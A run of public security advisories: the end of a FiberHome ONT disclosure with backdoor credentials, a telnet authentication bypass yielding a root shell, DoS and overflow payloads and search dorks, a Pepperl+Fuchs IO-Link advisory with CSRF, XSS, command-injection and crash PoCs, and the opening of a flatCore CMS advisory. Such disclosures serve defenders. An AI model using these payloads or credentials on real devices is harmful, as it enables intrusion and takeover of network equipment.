`init_3bb_password()` function located in `libci_adaptation_layer.so`
- - `rdsadmin` / `6GFJdY4aAuUKJjdtSn7d`
You can also test `gepon`/`gepon` (from the firmware extracted in the
other analyzed fiberhome device (AN5506-04-FA, firmware RP2631, 4
April 2019)).
## Details - Telnet server (CLI) - Privilege escalation
The CLI telnet server runs on port 23/tcp and can be reached by (i)
adding firewall rules from the HTTP server either using the backdoor
API, (ii) using backdoor credentials on the web interface or (iii)
exploiting a stack overflow in previous HTTP daemons.
It is also reachable by default over IPv6 on `br0` and `wan0` interface.
It is possible to start a Linux telnetd as root on port 26/tcp using
the CLI interface, as shown below:
User> ddd
WRI(DEBUG_H)> shell
Please use port 26 to telnet
WRI(DEBUG_H)> tshell
Please use port 26 to telnet
`shell` and `tshell` will call the function `enter_telnet_shell()`
from `libcli_cli.so`, running `system("telnet -p 26")`.
This telneld will then use hardcoded credentials.
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
Surprisingly, there is another function called `enter_tshell` (for a
legacy `tshell`) which will run a `system("sh")` as root.
This function `enter_tshell()` providing a rootshell is not being
called from `shell` so this looks like dead code:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]
## Details - Telnet server (CLI) - Authentication bypass
It is possible to bypass telnet authentication by sending a specific
string to the remote telnet server:
$ echo 'GgpoZWxwCmxpc3QKd2hvCg==' | base64 -d > bypass-auth-telnet
$ hexdump -C bypass-auth-telnet
00000000 1a 0a 68 65 6c 70 0a 6c 69 73 74 0a 77 68 6f 0a
|..help.list.who.|
00000010
$ nc 192.168.1.1 23 < bypass-auth-telnet
------acl IP:192.168.1.2 --------
Login:
User>
User> help
This system provides help feature as described below.
1. Anytime you need help, just press "?" and don't
press Enter,you can see each possible command argument
and its description.
2. You can also input "list" and then press Enter
to execute this helpful command to view the list of
commands you can use.
User> list
0. clear
1. enable
2. exit
3. help
4. list
5. ping {[-t]}*1 {[-count] <1-65535>}*1 {[-size] <1-6400>}*1
{[-waittime] <1-255>}*1 {[-ttl] <1-255>}*1 {[-pattern]
<user_pattern>}*1 {[-i] <A.B.C.C>}*1 <A.B.C.D>
6. quit
7. show history
8. show idle-timeout
9. show ip
10. show services
11. show syscontact
12. show syslocation
13. terminal length <0-512>
14. who
15. who am i
User> who
SessionID. - UserName ---------- LOCATION ---------- MODE ----
7 not login 192.168.1.2 not login (That's me.)
Total 1 sessions in current system.
User>
## Details - Telnet server (CLI) - Authentication bypass to start the
Linux telnetd
It is possible to use the previous authentication bypass to start a
full telnetd server on port 26 and then get a root shell using the
password from "Telnet server (Linux) - Hardcoded credentials).
By sending `ddd` then `tshell`, a telnetd will be started on port 26/tcp:
$ echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 &
------acl IP:192.168.1.2 --------
Login:
User>
User> help
This system provides help feature as described below.
1. Anytime you need help, just press "?" and don't
press Enter,you can see each possible command argument
and its description.
2. You can also input "list" and then press Enter
to execute this helpful command to view the list of
commands you can use.
User> list
0. clear
1. enable
2. exit
3. help
$ telnet target 26
Trying target...
Connected to target.
Escape character is '^]'.
(none) login: root
Password: [GEPON]
BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#id
uid=0(root) gid=0 groups=0
The attacker will get a root shell.
## Details - Telnet server (CLI) - DoS
It is possible to crash the telnet daemon by sending a specific string:
$ hexdump -C crash-auth-telnet
00000000 1a 0a 65 6e 61 62 6c 65 0a 02 0a 1a 0a |..enable.....|
0000000d
$ nc -v 192.168.1.1 23 < crash-auth-telnet
192.168.1.1: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.1.1] 23 (telnet) open
$ nc -v 192.168.1.1 23 < crash-auth-telnet
192.168.1.1: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.1.1] 23 (telnet) : Connection refused
This segfault exists inside `/fh/extend/load_cli` but was not studied
as the previous bypass already worked.
## Details - System - Credentials stored in clear-text
Some credentials are stored in clear-text with permissive rights:
#pwd
/fhconf/fh_wifi
#ls -la
drwxr-xr-x 2 root 0 536 Jan 7 2020 .
drwxr-xr-x 14 root 0 10264 Jan 8 15:29 ..
-rw-r--r-- 1 root 0 118 Jan 1 1970 wifi_custom.cfg
-rw-r--r-- 1 root 0 1212 Jan 7 2020 wifictl_2g.cfg
-rw-r--r-- 1 root 0 1178 Jan 7 2020 wifictl_2g.cfg.bak
-rw-r--r-- 1 root 0 1213 Jan 7 2020 wifictl_5g.cfg
-rw-r--r-- 1 root 0 1208 Jan 7 2020 wifictl_5g.cfg.bak
#cat /fhconf/fh_wifi/wifi_custom.cfg
ssid_2g=[REMOVED]
ssid_5g=[REMOVED]
country=BR
auth=WPAPSKWPA2PSK
encrypt=tkipaes
psk=[REMOVED]
#
#cat wifictl_2g.cfg
[...]
WPAPSK=[REMOVED]
[...]
WEPKey1=[REMOVED]
[...]
WEPKey2=[REMOVED]
[...]
WEPKey3=[REMOVED]
[...]
WEPKey4=[REMOVED]
[...]
RadiusKey=[REMOVED]
#cat wifictl_5g.cfg
SSID=[REMOVED]
[...]
WPAPSK=[REMOVED]
[...]
WEPKey1=[REMOVED]
[...]
WEPKey2=[REMOVED]
[...]
WEPKey3=[REMOVED]
[...]
WEPKey4=[REMOVED]
[...]
RadiusKey=[REMOVED]
## Details - Misc - Passwords stored in clear-text in nvram
Some passwords are stored in clear-text in nvram:
#nvram show
wl0.1_key=1
wl0.1_key1=[REMOVED]
wl0.1_key2=[REMOVED]
wl0.1_key3=[REMOVED]
wl0.1_key4=[REMOVED]
[...]
wl0.1_ssid=[REMOVED]
[...]
wl0.1_wpa_psk=[REMOVED]
[...]
wl0_key1=[REMOVED]
wl0_key2=[REMOVED]
wl0_key3=[REMOVED]
wl0_key4=[REMOVED]
[...]
wl0_ssid=[REMOVED]
[...]
wl0_wpa_psk=[REMOVED]
[...]
[ passwords everywhere removed because of space ]
[...]
## Details - Misc - Remote stack overflow in the HTTP server
(AN5506-04-FA / RP2631)
I got another Fiberhome device with a different firmware version
(AN5506-04-FA, firmware RP2631, 4 April 2019). The HG6245D and the
AN5506-04-FA devices share a very similar code base.
The firmware on the AN5506-04-FA device is vulnerable to a remote
stack overflow in the `webs` process by sending a Cookie value with a
length > 511 bytes to any valid asp webpage. This can be triggered
using a simple wget command:
$ wget --no-check-certificate -O- --header 'Cookie:
loginName=AAAA[511bytes]AAAA' https://192.168.1.1/tr069/tr069.asp
In the HG6245D firmware version RP2602, this vulnerability has been
patched by checking the size of values in the cookies, so I was not
able to exploit it. You can also read the log file to confirm the
length is now checked:
<web_ga>2020-01-08
21:23:12,../thd_ga2_5/webs.c[1375](websParseRequest): Request header
param value is too long! key: cookie
It appears it has been patched in the HG6245D router, firmware RP2602.
Firmware RP2631 (4 April 2019) for router AN5506-04-FA remains
vulnerable.
I found no CVE or public research about this vulnerability so it may
have been silently patched by the vendor for the HG6245D router.
## Dorks
"acl IP:"
"GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.4.2-OPEN"
## Vendor Response
Full-disclosure is applied as it is believed that some backdoors have
been intentionally placed by the vendor.
## Report Timeline
* Jan 7, 2020: Majority of vulnerabilities found.
* Jan 8, 2020: This advisory was written.
* Aug 2020: Found the lack of IPv6 firewall.
* Jan 9, 2021: Vulnerabilities checked again and the advisory was rewritten.
* Jan 12, 2021: A public advisory is sent to security mailing lists.
## Credits
These vulnerabilities were found by Pierre Kim (@PierreKimSec).
## References
https://pierrekim.github.io/advisories/2021-fiberhome-0x00-ont.txt
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
## Disclaimer
This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAl/5sJsACgkQxD4O2n2T
LbyPqw/9GUqpwf47Y3kn0PP8nlhhseRakIOPvLbhPcrB0erTg1vSja7wjqTrbHun
5jDuVV8anLIIHfyR4p1BU0qgUzU29JcGl41t1+wQhG8mt5pvFofZlIlwUwhe2tJg
fFMvGA3/YyGbKAKNRZQibbjnARCS9WYqZBWy/l3P1VUSY32mR1ifroENABG6s7Q+
FnAtIzRufiFjOYe0iOPXeqKOe4z/JRtjznSc2YFhLid0TQC+rmh37mN+b8yPwmyX
x01wMC904JF88qLQBym8VSLZkRuzyyrnsSZd5/BX1M6J8GQkxzyfUn2FBof2OnMJ
i28qLmSxGd6TprhtB2XM9V6snomss/b9zvYXtdVjzCgDZ8/P07NvJf0Sxo5pOMJC
60CHTsfQk0vREdHtibjiVR/XCEJkACkW+PDFo+Fvs4By3yJFhqar1cK4mujvwYe5
392yAc77z96WXI0dwD/nxdNNyPM635hTuyFECMK8FTjnYBjSNjmYDmBRF2T3fxda
oytz1qNnLT/JnPSZhByCz04ok1BSN/HQcUL9rFXmDGMKL12YmcgB/WpHF61CAw0q
XKKKY6OtL1u3kB+EmEuCljiSZzV2zumN43Y3V5OewHDeQ+lZI+GSpWngcipcTy8y
Xdj6+ehDf2Xd8AG9dDlO7yDUEO3gVRt+XAcbav7WW0JeFt4wwPg=
=YoWf
-----END PGP SIGNATURE-----
--
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
https://pierrekim.github.io/
Pepperl+Fuchs IO-Link Master Series with system version 1.36 and application version 1.5.28 suffers from command injection, cross site request forgery, cross site scripting, denial of service, and null pointer vulnerabilities.
aa2d5c40642dad8f8d6fe9a2f9666788SEC Consult Vulnerability Lab Security Advisory < 20210113-0 >
=======================================================================
title: Multiple vulnerabilities
product: Pepperl+Fuchs IO-Link Master Series
See "Vulnerable / tested versions"
vulnerable version: System 1.36 / Application 1.5.28
fixed version: System 1.52 / Application 1.6.11
CVE number: CVE-2020-12511, CVE-2020-12512, CVE-2020-12513,
CVE-2020-12514
impact: High
homepage: https://www.pepperl-fuchs.com
found: 2020-04-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Automation is our world. Perfect application solutions are our goal.
In 1945, Walter Pepperl and Ludwig Fuchs founded a small radio workshop in
Mannheim, Germany, based on the principles of inventiveness, entrepreneurial
foresight, and self-reliance. The experience they acquired was transformed into
new ideas, and they continued to enjoy developing products for customers. The
eventual result was the invention of the proximity switch. This innovation rep-
resented the starting point of the company's success story.
Today, Pepperl+Fuchs is known by customers around the world as a pioneer and an
innovator in electrical explosion protection and sensor technology. Our main
focus is always on your individual requirements: With a passion for automation
and groundbreaking technology, we are committed to working in partnership with
you now and in the future. We understand the demands of your markets, develop-
ing specific solutions, and integrating them into your processes."
Source: https://www.pepperl-fuchs.com/usa/en/25.htm
Business recommendation:
------------------------
SEC Consult recommends to update the devices to the newest firmware packages
(System 1.36 / Application 1.5.28), where the documented issues are fixed
according to the vendor.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The web interface that is used to set all configurations, is vulnerable to
cross-site request forgery attacks. An attacker can change settings via this
way by luring the victim to a malicious website.
2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)
An authenticated reflected cross-site scripting can be triggered by issuing a
POST request to the "/Software" endpoint which is available on the web-service.
An attacker can abuse these vulnerabilities to steal cookies from the attacked
user in order to log on to the device. An attacker is also able to perform
actions in the context of the attacked user.
3) Authenticated Blind Command Injection (CVE-2020-12513)
A command injection was identified in the web-interface. This vulnerability is
present because of unfiltered user input that is appended to a string which
gets executed with "exec()". Commands are executed as root user.
4) Null Pointer Dereference / DoS in "discoveryd" (CVE-2020-12514)
The discovery daemon ("discoveryd") is started during the bootup of the device.
The program is used for the network management program "PortVision DX". It is
designed with unsafe functions and is vulnerable to a DoS attack. This is
triggered due to a null dereference in strlen. A debug mode is also available in
the program. This can be activated by starting the discovery daemon with
"discoveryd -vv". All inputs are printed to the stdout during its execution
with this argument. This is not done in the productive device but can lead to
more severe attacks.
5) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The following PoC can be used to change the hostname of the device to "SEC-
Consult":
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://$IP/configuration_tab/ajax_comb_table_save/network_config/network_config_schema" method="POST">
<input type="hidden" name="form"
value="Hostname=SEC-Consult&IPv4mode=static&IPv4address=1.101&IPv4netmask=255.255.255.0&IPv4gateway=1.1.12&DNSmode=manual&IPv4DNS1=&IPv4DNS2=&IpAddrCnflctDetectEnbl=enable&NtpServer=&SyslogServer=&SyslogPort=514&SshServerEnable=disable"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)
By sending the following request to the web-service, a reflected cross-site
scripting vulnerability can be triggered:
-------------------------------------------------------------------------------
POST /Software HTTP/1.1
Host: $IP
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: ui_language=en_US; PHPSESSID=r7jtaceerqeijqr4b2dl0us814
Upgrade-Insecure-Requests: 1
language=german'><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
The server responds with the following content:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Content-Length: 11860
Connection: close
Date: Thu, 01 Jan 1970 00:59:46 GMT
Server: lighttpd/1.4.41
[...]
<div class="page-content">
<div class="page-header">
<h1>Software <a href='/assets/WebHelp/german'><script>alert(document.cookie)</script>/advanced/software.htm' target='_blank'><img src='/assets/images/question_16.png' alt='Page-specific Help'></a></h1>
<a class="latest-version" href="#">Check for latest version</a>
</div>
[...]
-------------------------------------------------------------------------------
PoC-Exploit code for the cross-site scripting vulnerability:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/Software" method="POST">
<input type="hidden" name="language" value="german'><script>alert(document.cookie)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Authenticated Blind Command Injection (CVE-2020-12513)
By entering a command in the field "code" under the tab "IO-Link Test Event
Generation" on the endpoint "/Misc/Settings" that is surrounded by ";", it
gets executed. The following POST request to the web-service demonstrates this
with the command "ping 127.0.0.1":
-------------------------------------------------------------------------------
POST /index.php/ajax/generate_iolink_event/ HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://$IP/Misc/Settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
Cookie: ui_language=en_US; PHPSESSID=lh8d4g4e8fm9f1732j9g6bm3a0
mode=single&type=message&instance=unknown&source=local&pdivalid=valid&code=0x0000%3Bping+127.0.0.1%3B
-------------------------------------------------------------------------------
There is no response from the web-service which indicates to the attacker that
the command was executed. As this was tested on an emulated device only, the
commands were seen in the process list which proofed that it was executed
as root:
-bash-4.4# ps
PID USER COMMAND
[...]
216 root /usr/sbin/restoremonitor
272 root /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
333 root /apps/bin/appmgr
347 root 05discoverd
349 root 11iolinkconfigd
353 root 90netconfig-saved
354 root 90netconfig-working
385 root lighttpd -f /apps/www/lighttpd.conf
386 root /usr/bin/php-cgi
387 root /usr/bin/php-cgi
388 root /usr/bin/php-cgi
389 root /usr/bin/php-cgi
390 root /usr/bin/php-cgi
391 root /usr/bin/php-cgi
392 root config waitcmd working network /apps/bin/updateLighttpdAuth
395 root /usr/bin/php-cgi
397 root -bash
399 root /usr/bin/php-cgi
473 root udhcpc -R -n -O search -p /var/run/udhcpc.eth0.pid -i eth0 -x ho
2519 root [kworker/u3:2]
3173 root sh -c injectEvent -m single -t message -i unknown -s local -v va
3175 root ping 127.0.0.1
3509 root 50ethernetip
3541 root [10iolinkd]
3544 root ps
4) Null Pointer Dereference / DoS in "discoverd" (CVE-2020-12514)
Payload for triggering a segmentation fault (caused by a null pointer dereference):
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x00\x0c\x00\x10\x10" | nc -u $IP 4606
Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb)
Payload for writing ASCII characters in debug mode ("discoveryd -vv"). Register
R4 can be controlled via a byte (filled with value "\xab") also in normal mode
("discoveryd"):
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63" | nc -u $IP 4606
Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb) i r
r0 0x0 0
r1 0x0 0
r2 0xbefffb9b 3204447131
r3 0x0 0
r4 0xab 171
r5 0x1da 474
r6 0xb6f8dbee 3069762542
r7 0x0 0
r8 0x0 0
r9 0x0 0
r10 0xb6ffef74 3070226292
r11 0xbefff574 3204445556
r12 0xb6f5dfb0 3069566896
sp 0xbefff558 0xbefff558
lr 0xaf9c 44956
pc 0xb6f5dfb4 0xb6f5dfb4 <strlen+4>
cpsr 0xa0000010 -1610612720
fpscr 0x0 0
More bytes than in this payload will lead to another program execution path in
debug mode ("discoveryd -vv").
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606
Other program paths, depending on the current memory, can be triggered with
this payload in debug mode due to printf:
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606
In normal mode, only a null pointer dereference is triggered which leads to a
program crash.
5) Outdated and Vulnerable Software Components
* PHP 5.6.15
* lighttpd 1.4.41
* OpenSSL 1.0.2j
* Linux Kernel 2.6.30
* BusyBox 1.26.2
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
]55;test.txt
#
-------------------------------------------------------------------------------
The vulnerabilities 1), 2), 3) and 4) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.
Vulnerable / tested versions:
-----------------------------
The IO-Link Master devices are sharing the same firmware base. The
vulnerabilities were tested on an emulated firmware (system 1.36/ app EIP 1.5.28).
According to the vendor, all firmware versions below 1.5.48 are vulnerable:
IO-Link Master 4-EIP / <=1.5.48
IO-Link Master 8-EIP / <=1.5.48
IO-Link Master 8-EIP-L / <=1.5.48
IO-Link Master DR-8-EIP / <=1.5.48
IO-Link Master DR-8-EIP-P / <=1.5.48
IO-Link Master DR-8-EIP-T / <=1.5.48
IO-Link Master 4-PNIO / <=1.5.48
IO-Link Master 8-PNIO / <=1.5.48
IO-Link Master 8-PNIO-L / <=1.5.48
IO-Link Master DR-8-PNIO / <=1.5.48
IO-Link Master DR-8-PNIO-P / <=1.5.48
IO-Link Master DR-8-PNIO-T / <=1.5.48
Vendor contact timeline:
------------------------
2020-04-30 | Contacting VDE CERT through info@cert.vde.com.
2020-07-29 | Received confirmation from VDE CERT.
2020-07-31 | Call with P+F regarding vulnerabilities from this and another
advisory.
2020-09-29 | Call with Pepperl+Fuchs and CERT@VDE regarding status.
2020-10-02 | Received CVE IDs and preliminary advisory from VDE@CERT.
2020-11-11 | Call with Pepperl+Fuchs regarding the patches. They should be
available within the next two weeks according to P+F. Agreed
with P+F and VDE CERT to release the security advisory next year.
2020-12-14 | Received preliminary advisory from P+F. Set publication date to
2021-01-04.
2021-01-04 | Received final advisory from P+F.
2021-01-13 | Coordinated release of security advisory.
Solution:
---------
Update the firmware to Application 1.6.11 / System 1.52 to resolve the security
issues.
According to Pepperl+Fuchs, the following steps are recommended to be taken:
"In order to prevent the exploitation of the reported vulnerabilities, we
recommend that the affected units be updated with the following three firmware
packages:
- U-Boot bootloader version 1.36 or newer
- System image version 1.52 or newer
- Application base version 1.6.11 or newer
Furthermore, it is always recommended to observe the following measures if the
affected products are connected to public networks:
1. An external protective measure to be put in place.
Traffic from untrusted networks to the device should be blocked by a firewall.
Especially traffic targeting the administration webpage.
2. Device user accounts to be enabled with secure passwords.
If non-trusted people/applications have access to the network that the device
is connected to, then configuring passwords for all three User Accounts
is recommended."
Pepperl+Fuchs advisory page:
https://www.pepperl-fuchs.com/germany/de/29079.htm
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2021
flatCore CMS versions prior to 2.0.0 build 139 suffer from cross site scripting, file disclosure, and remote SQL injection vulnerabilities.
1fa6af99aeb588403f58ee25830613f4SEC Consult Vulnerability Lab Security Advisory < 20210113-1 >
=======================================================================
title: Multiple Vulnerabilities
product: flatCore CMS
vulnerable version: < 2.0.0 Build 139
fixed version: Release 2.0.0 Build 139
CVE number: CVE-2021-23835, CVE-2021-23836, CVE-2021-23837, CVE-2021-23838
impact: High
homepage: https://flatcore.org/
found: 2020-11-20
by: Yew Chung Cheah (Office Singapore)
Calvin Phang (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"flatCore is based on PHP and PDO/SQLite. The Core is as minimalistic as
possible, but can be easily extended by the modular structure. If you are
looking for a solution to edit your website live and with ease, flatCore
may be your buddy."
Source: https://flatcore.org/
Business recommendation:
------------------------
The vendor provides an updated version which should be installed immediately.
An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (Authenticated user) (CVE-2021-23838)
A reflected cross-site scripting vulnerability was identified in the 'media_filter'
HTTP request body parameter for the 'acp' interface. The affected parameter
